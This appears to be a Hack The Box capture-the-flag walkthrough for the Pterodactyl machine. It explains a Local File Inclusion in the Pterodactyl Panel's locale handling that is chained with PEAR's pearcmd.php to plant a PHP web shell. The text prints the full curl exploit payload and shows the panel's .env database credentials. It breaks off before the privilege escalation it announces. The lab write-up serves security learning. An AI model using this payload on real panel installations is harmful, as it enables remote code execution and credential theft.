In this walkthrough, we’ll explore the full exploitation path of the Pterodactyl machine on Hack The Box. This journey takes us from an unauthenticated RCE in a popular game management panel to a sophisticated privilege escalation chain involving PAM environment manipulation and a race condition in udisks2.
Our entry point was the Pterodactyl Panel, a widely used open-source game server management platform. During reconnaissance, we identified a Local File Inclusion (LFI) vulnerability in the LocaleController. The application failed to sanitize the locale parameter before using it in a file operation, allowing for directory traversal.
The target system had the PEAR (PHP Extension and Application Repository) package installed. By traversing to /usr/share/php/PEAR, we could include pearcmd.php. This tool is powerful because it processes command-line arguments passed via the PHP $_SERVER['argv'] array, which can be manipulated through the URL.
We targeted the PEAR config-create command. This command takes two primary arguments: a "root directory" and a destination path for the configuration file. By injecting a PHP system shell into the first argument and specifying a file in the web root as the second, we effectively "installed" a web shell.
The Exploit Payload:
curl "<http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../../../usr/share/php/PEAR&namespace=pearcmd&command=config-create&/><?=@system(\\\\$_GET['cmd']);?>&/var/www/pterodactyl/public/shell.php"
This granted us execution as the wwwrun user.
As wwwrun, we immediately began exfiltrating the Laravel environment. Reading /var/www/pterodactyl/.env revealed the database credentials:
panelpterodactylPteraPanel